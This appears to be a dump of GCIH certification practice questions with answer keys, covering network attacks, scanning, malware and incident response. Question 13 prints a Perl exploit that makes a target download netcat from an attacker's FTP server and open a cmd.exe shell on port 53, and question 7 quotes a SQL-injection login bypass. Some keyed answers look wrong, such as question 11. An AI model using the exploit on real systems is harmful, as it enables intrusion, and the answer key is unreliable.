GCIH | The Up To Date Guide To GCIH Exam

NEW QUESTION 1
Adam, a malicious hacker purposely sends fragmented ICMP packets to a remote target. The total size of this ICMP packet once reconstructed is over 65,536 bytes. On the basis of above information, which of the following types of attack is Adam attempting to perform?

• A. Fraggle attack
• B. Ping of death attack
• C. SYN Flood attack
• D. Land attack

Answer: B

NEW QUESTION 2
Which of the following types of scan does not open a full TCP connection?

• A. FIN scan
• B. ACK scan
• C. Stealth scan
• D. Idle scan

Answer: C

NEW QUESTION 3
Which of the following applications automatically calculates cryptographic hashes of all key system files that are to be monitored for modifications?

• A. Tripwire
• B. TCPView
• C. PrcView
• D. Inzider

Answer: A

NEW QUESTION 4
An Active Attack is a type of steganography attack in which the attacker changes the carrier during the communication process. Which of the following techniques is used for smoothing the transition and controlling contrast on the hard edges, where there is significant color transition?

• A. Soften
• B. Rotate
• C. Sharpen
• D. Blur

Answer: D

NEW QUESTION 5
You discover that all available network bandwidth is being used by some unknown service. You discover that UDP packets are being used to connect the echo service on one machine to the chargen service on another machine. What kind of attack is this?

• A. Smurf
• B. Denial of Service
• C. Evil Twin
• D. Virus

Answer: B

NEW QUESTION 6
In which of the following scanning methods do Windows operating systems send only RST packets irrespective of whether the port is open or closed?

• A. TCP FIN
• B. FTP bounce
• C. XMAS
• D. TCP SYN

Answer: A

NEW QUESTION 7
John works as a Professional Penetration Tester. He has been assigned a project to test the Website security of www.we-are-secure Inc. On the We-are-secure Website login page, he enters ='or''=' as a username and successfully logs on to the user page of the Web site. Now, John asks the we-aresecure Inc. to improve the login page PHP script. Which of the following suggestions can John give to improve the security of the we-are-secure Website login page from the SQL injection attack?

• A. Use the escapeshellarg() function
• B. Use the session_regenerate_id() function
• C. Use the mysql_real_escape_string() function for escaping input
• D. Use the escapeshellcmd() function

Answer: C

NEW QUESTION 8
The Klez worm is a mass-mailing worm that exploits a vulnerability to open an executable attachment even in Microsoft Outlook's preview pane. The Klez worm gathers email addresses from the entries of the default Windows Address Book (WAB). Which of the following registry values can be used to identify this worm?

• A. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
• B. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
• C. HKEY_CURRENT_USER\Software\Microsoft\WAB\WAB4\Wab File Name = "file and pathname of the WAB file"
• D. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

Answer: C

NEW QUESTION 9
You work as a Network Administrator for Perfect Solutions Inc. The company has a Linux-based network. You are working as a root user on the Linux operating system. Your company is facing an IP spoofing attack.
Which of the following tools will you use to get an alert saying that an upcoming IP packet is being spoofed?

• A. Despoof
• B. Dsniff
• C. ethereal
• D. Neotrace

Answer: A

NEW QUESTION 10
TCP/IP stack fingerprinting is the passive collection of configuration attributes from a remote device during standard layer 4 network communications. The combination of parameters may then be used to infer the remote operating system (OS fingerprinting), or incorporated into a device fingerprint.
Which of the following Nmap switches can be used to perform TCP/IP stack fingerprinting?

• A. nmap -sS
• B. nmap -sU -p
• C. nmap -O -p
• D. nmap -sT

Answer: C

NEW QUESTION 11
Which of the following attacks come under the category of layer 2 Denial-of-Service attacks?
Each correct answer represents a complete solution. Choose all that apply.

• A. Spoofing attack
• B. SYN flood attack
• C. Password cracking
• D. RF jamming attack

Answer: AB

NEW QUESTION 12
Which of the following attacking methods allows the bypassing of access control lists on servers or routers, either hiding a computer on a network or allowing it to impersonate another computer by changing the Media Access Control address?

• A. IP address spoofing
• B. VLAN hoping
• C. ARP spoofing
• D. MAC spoofing

Answer: D

NEW QUESTION 13
Adam, a malicious hacker performs an exploit, which is given below:
#####################################################
$port = 53;
# Spawn cmd.exe on port X
$your = "192.168.1.1";# Your FTP Server 89
$user = "Anonymous";# login as
$pass = 'noone@nowhere.com';# password
#####################################################
$host = $ARGV[0];
print "Starting ...\n";
print "Server will download the file nc.exe from $your FTP server.\n"; system("perl msadc.pl -h $host -C \"echo
open $your >sasfile\""); system("perl msadc.pl -h $host -C \"echo $user>>sasfile\""); system("perl msadc.pl -h
$host -C \"echo $pass>>sasfile\""); system("perl msadc.pl -h $host -C \"echo bin>>sasfile\""); system("perl msadc.pl -h $host -C \"echo get nc.exe>>sasfile\""); system("perl msadc.pl -h $host ­C \"echo get hacked. html>>sasfile\""); system("perl msadc.pl -h $host -C \"echo quit>>sasfile\""); print "Server is downloading ...
\n";
system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\""); print "Press ENTER when download is finished ...
(Have a ftp server)\n";
$o=; print "Opening ...\n";
system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\""); print "Done.\n"; #system("telnet $host $port"); exit(0);
Which of the following is the expected result of the above exploit?

• A. Creates a share called "sasfile" on the target system
• B. Creates an FTP server with write permissions enabled
• C. Opens up a SMTP server that requires no username or password
• D. Opens up a telnet listener that requires no username or password

Answer: D

NEW QUESTION 14
Which of the following ensures that the investigation process of incident response team does not break any laws during the response to an incident?

• A. Information Security representative
• B. Lead Investigator
• C. Legal representative
• D. Human Resource

Answer: C

NEW QUESTION 15
Firekiller 2000 is an example of a __________.

• A. Security software disabler Trojan
• B. DoS attack Trojan
• C. Data sending Trojan
• D. Remote access Trojan

Answer: A

NEW QUESTION 16
Brutus is a password cracking tool that can be used to crack the following authentications:
l HTTP (Basic Authentication)
l HTTP (HTML Form/CGI)
l POP3 (Post Office Protocol v3)
l FTP (File Transfer Protocol)
l SMB (Server Message Block)
l Telnet
Which of the following attacks can be performed by Brutus for password cracking?
Each correct answer represents a complete solution. Choose all that apply.

• A. Hybrid attack
• B. Replay attack
• C. Dictionary attack
• D. Brute force attack
• E. Man-in-the-middle attack

Answer: ACD

NEW QUESTION 17
Which of the following nmap command parameters is used for TCP SYN port scanning?

• A. -sF
• B. -sU
• C. -sX
• D. -sS

Answer: D

NEW QUESTION 18
......